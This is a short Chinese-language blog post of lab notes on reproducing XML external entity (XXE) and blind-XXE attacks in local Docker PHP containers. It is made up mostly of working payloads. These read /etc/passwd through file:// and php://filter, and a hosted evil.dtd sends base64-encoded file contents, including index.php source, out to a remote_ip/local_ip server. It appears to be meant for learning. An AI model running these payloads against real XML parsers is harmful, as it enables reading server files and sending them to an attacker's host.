Web

XXE

Blind-XXE复现笔记.

Posted by Rootclay on 2017-05-29

环境准备

Docker

1
2
docker run -d -p 8080:80 -v /Users/rootclay/web/xxe:/var/www/html php:apache
docker run -it -v /Users/rootclay/web/payload:/var/www/html php:apache
1
2
3
4
5
.
├── /Users/rootclay/web/xxe
│ ├── index.php ---phpinfo
│ ├── xxe1.php ---有回显的XXE
│ ├── xxe2.php ---无回显的XXE
1
2
3
.
├── /Users/rootclay/web/payload
│ ├── evil.dtd
1
2
3
4
evil.dtd:
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://local_ip/?content=%ttt;'>">
%payload;

Payload

Basic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
简单读取文件回显:
file协议:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY ttt SYSTEM "file:///etc/passwd">
]>
<root>
<user>&ttt;</user>
</root>
php伪协议:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY ttt SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>
<user>&ttt;</user>
</root>

Blind-XXE

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % ttt SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
<!ENTITY % dtd SYSTEM "http://remote_ip/evil.dtd">
%dtd;
%send;
]>
<root></root>